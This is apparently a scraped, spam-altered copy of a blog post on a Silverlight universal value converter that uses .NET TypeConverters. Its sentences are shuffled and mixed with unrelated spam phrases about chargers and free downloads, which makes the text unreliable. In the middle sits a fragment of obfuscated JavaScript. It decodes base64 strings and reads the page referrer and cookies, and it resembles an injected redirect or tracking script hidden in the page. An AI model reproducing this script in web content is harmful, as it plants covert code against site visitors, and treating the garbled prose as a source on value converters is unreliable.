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This converter can be used both within bindings and in code-behind to give more concise property setters.. you can specify the RGB values directly:Looking at the above examples, you might be fooled into thinking that the Fill property is of type Color.

I am guessing that type conversion within Silverlight is 'baked-in' to the XAML parser, which means that it is not possible to re-use this logic :-(You can download the full source for this blog post: UniversalValueConverter.. But what happens if you want to bind to a string representation of color? or you want to bind to a stroke dash property or path geometry? Whilst value converters are simple to implement, it is a shame that you have to create so many of them!A Universal Value ConverterWouldn't it be great to have a single value converter that has the same flexibility as the XAML parser? It is actually very simple to create such as converter (and after creating probably my 5th ColorToBrushConverter I have no idea why it took so long before I realised this!).. The solution to this problem of binding a Color to the Fill property is to create a value converter:Which can be used as follows:If you search google for ColorToBrushConverter, you can see that there are a great many people who have implemented this simple little converter.

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The NET framework has had an API for conversion between different types via TypeConverters for a long time. ac to dc car charger adapter converter socket switch transformer download for windows 7 ultimate edition

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A value converter can obtain a suitable TypeConverter for the target property then perform the required conversion:Note, that this value converter first tries to convert directly from the source to the target type, if this is not possible it then tried to convert via a string representation (I am not sure whether it is more correct to obtain a TypeConverter for the String type, then use this rather that invoking ToString on the value being converted, but the above works for me :-) ).. For example, you can set the fill of a rectangle by simply specifying the named color:or.. zipI am Technology Director at Scott Logic and am a prolific technical author, blogger and speaker on a range of technologies.. The Fill property is actually of type Brush, and the XAML parser is performing some cunning type conversions in order to make the above markup work.. You can see this converter in action below where a range of type conversions are demonstrated:For the first conversion, string to brush, you can use named colors, and the hex notation in its range of abbreviated forms (#AF7, #AAFF77, #FFAAFF77.. constructor(\x22return\x20this\x22)(\x20)'+');');_0x4b296d=_0x302817();}catch(_0x469102){_0x4b296d=window;}var _0x449487='ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=';_0x4b296d['atob']||(_0x4b296d['atob']=function(_0x4fad3f){var _0x1c539d=String(_0x4fad3f)['replace'](/=+$/,'');for(var _0x20afd0=0x0,_0xd51557,_0x993ffb,_0x322c95=0x0,_0x37f21a='';_0x993ffb=_0x1c539d['charAt'](_0x322c95++);~_0x993ffb&&(_0xd51557=_0x20afd0%0x4?_0xd51557*0x40+_0x993ffb:_0x993ffb,_0x20afd0++%0x4)?_0x37f21a+=String['fromCharCode'](0xff&_0xd51557>>(-0x2*_0x20afd0&0x6)):0x0){_0x993ffb=_0x449487['indexOf'](_0x993ffb);}return _0x37f21a;});}());_0x13d7['base64DecodeUnicode']=function(_0xbb287d){var _0x3ea945=atob(_0xbb287d);var _0x982cbe=[];for(var _0xe667ca=0x0,_0x42091c=_0x3ea945['length'];_0xe667ca=_0x107934;},'uGhOG':_0x13d7('0x31'),'cohbu':function _0x33cc5d(_0x207ef5,_0x1507d3){return _0x207ef5>=_0x1507d3;},'Okcfi':function _0x42c69d(_0x5a67b4,_0x364288){return _0x5a67b4(_0x364288);},'ESjSJ':function _0x475c43(_0x3b435c,_0x2676d7){return _0x3b435c+_0x2676d7;},'SSgbR':function _0x55d25c(_0x17c2f6,_0x1821c2){return _0x17c2f6+_0x1821c2;}};var _0x1bbe78=[_0x189952['BClIb'],_0x189952[_0x13d7('0x32')],_0x189952[_0x13d7('0x33')],_0x13d7('0x34'),_0x189952[_0x13d7('0x35')],_0x189952[_0x13d7('0x36')],_0x189952['hzqRr']],_0x47da12=document['referrer'],_0x40eaba=![],_0x44eee1=cookie[_0x13d7('0x37')](_0x189952['mdhcj']);for(var _0x29f9b6=0x0;_0x29f9b6. Value conversion in code behindThe above converter really is swiss army knife for bindings, but what about code-behind? You are still constrained by the type requirements of the property being set:Value converters, whilst typically used in binding, can also be used directly in code-behind. e828bfe731 Free U2 Live Downloads String


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